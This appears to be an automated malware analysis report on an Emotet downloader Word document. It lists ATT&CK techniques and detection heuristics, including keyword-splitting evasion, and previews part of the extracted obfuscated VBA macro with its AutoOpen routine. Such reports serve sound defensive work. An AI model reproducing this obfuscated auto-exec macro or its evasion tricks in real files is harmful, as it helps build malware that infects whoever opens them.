Verdict: MALICIOUS
Risk Score: 342
Malware Insights
MITRE ATT&CK
- T1059.005 Visual Basic
- T1204.002 Malicious File
- T1059 Command and Scripting Interpreter
- T1105 Ingress Tool Transfer
The sample is a malicious Office document containing a VBA macro. The macro utilizes obfuscated API calls, specifically reassembling the string 'winmgmts' to launch a WMI process. This indicates an intent to download and execute a second-stage payload, consistent with Emotet downloader behavior. ClamAV detection further supports this classification.
Heuristics (9)
- ClamAV: Doc.Downloader.Emotet-6961571-0 (critical) CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Downloader.Emotet-6961571-0
- VBA macros detected (medium, 5 related findings) OLE_VBA_MACROS: Document contains VBA macro code
- VBA WMI Win32_Process launcher (critical) OLE_VBA_WMI_PROCESS_CREATE: VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
- Dangerous API name reassembled from split string literals (critical) OLE_VBA_SPLIT_KEYWORD_OBFUSCATION: VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
- AutoOpen macro (high) OLE_VBA_AUTOOPEN: AutoOpen macro
- GetObject call (high) OLE_VBA_GETOBJ: GetObject call
- VBA p-code auto-exec with execution tokens (high) OLE_VBA_PCODE_AUTOEXEC_EXEC: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium) OLE_LEGACY_WORDBASIC_AUTOEXEC: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info) EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 48469 bytes | 878dd92b7e59473d21017fb0fb428492c2493b535925db5cfffc35f41baaaab0 |

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "u186448_"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "A48033"
Attribute VB_Base = "0{9AB66006-30BF-4D23-9C1B-E33866D7A8EA}{F17C468E-30BE-4FA2-9900-1D00A51B6D3F}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Q75_588"
Attribute VB_Name = "z68272"
Attribute VB_Name = "I6009126"
Attribute VB_Base = "0{B8AE5069-FB83-451A-B248-488A96D6DBD1}{35CE6481-853F-4A12-A1F6-1371FD2E7675}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "j355575"
Function P_403621(R65_2181)
Select Case Y5__8541
Case w_52084 = X14616
WeekdayName F027995 + c333_382 + (K427768 / 311893928 + (v_6_92 - Hex(q33_6_2 - v69748 * Q_46226 + Cos(B794591 + 215685281 - 352000946))))
Case M93573 = D7736562
WeekdayName k1952064 + m95_784 + (s0058606 / 369746922 + (w7238179 - Hex(v34314 - h92_511 * D_45211 + Cos(k24626 + 971679756 - 523163877))))
End Select
Select Case t9_44660
Case A44317 = m7508457
WeekdayName z3418_ + w45309 + (p36619 / 247588718 + (T6_17087 - Hex(n8_75908 - a884563 * A3_854 + Cos(G459750 + 823330785 - 579843263))))
Case F932223 = i8186458
WeekdayName d40485 + u3969871 + (D0727895 / 219524125 + (O_3164 - Hex(X69544 - J05169 * u658364 + Cos(f7365455 + 824673226 - 82169901))))
End Select
Select Case j825568
Case i7_1150 = u117449
WeekdayName A_18__ + J_10_9 + (s96366 / 816472186 + (N7714976 - Hex(j7_81193 - n_307664 * Y299845 + Cos(J5572660 + 133300817 - 436270560))))
Case Q_624496 = O99370
WeekdayName k8748454 + E7506_ + (K74_78 / 985351992 + (d9__78 - Hex(c1_33913 - P054015 * h81_593 + Cos(K46032_ + 873663906 - 176770177))))
End Select
Set P_403621 = CVar(R65_2181)
Select Case i2_20_91
Case w5895151 = P97476
WeekdayName t073667 + X106204 + (c629628 / 563635249 + (i7657433 - Hex(z3215__7 - z352_0 * S57000 + Cos(v843_723 + 551116620 - 308711073))))
Case T62106 = M568_2
WeekdayName E1543514 + K422776 + (r3714159 / 473267411 + (P094260 - Hex(w6085463 - s2851661 * o87292 + Cos(p_18659 + 358284753 - 413071179))))
End Select
Select Case A340368
Case P391908 = v37729
WeekdayName T02174 + i2895702 + (f_538_ / 681486187 + (V1526322 - Hex(T8_741 - R0455212 * I3353708 + Cos(J6461_ + 24822658 - 398568105))))
Case E2__465 = O1576_7
WeekdayName Z5870809 + T6286471 + (C8302_ / 955901499 + (q66_1_48 - Hex(P27_78 - U040_4 * r206_810 + Cos(u71938 + 73124123 - 726124901))))
End Select
Select Case G606939
Case G8_19073 = h8135933
WeekdayName D350_0 + Z3763_74 + (G_84683 / 739786347 + (U96__4 - Hex(O2106089 - X17258 * T9987302 + Cos(j77_3813 + 452577503 - 243430467))))
Case i8424173 = u1012769
WeekdayName d_19660 + H30772 + (b_96150 / 715500031 + (I65982 - Hex(f77792 - L61640 * z03_67 + Cos(z68585 + 625801103 - 667691583))))
End Select
End Function
Sub autoopen()
Select Case k32051
Case E_35792 = d126_3_
WeekdayName w610703 + X3956066 + (z5457682 / 807355329 + (z2792_63 - Hex(M428782 - B63343 * U4_958 + Cos(C3750_3 + 761155360 - 416969660))))
Case J81967 = P9_4760
WeekdayName S7083276 + U13596 + (V56520_ / 626917154 + (v1_104 - Hex(u51754_6 - E429616 * v6_8756 + Cos(I530117 + 693031406 - 446444453))))
End Select
Select Case I846209
Case X3767131 = E37374_4
WeekdayName i1684039 + Y89__851 + (R987_27 / 477895206 + (J73135 - Hex(L8069635 - O__04_5 * t82491 + Cos(u5986_6 + 855987001 - 245916624))))
Case z3569_39 = O48520
WeekdayName V168_4 + z915113 + (G5254730 / 291952869 + (D35139 - Hex(T33262_ - p33126_5 * D63078_ + Cos(U1233737 + 864864300 - 323233399))))
End Select
... (truncated)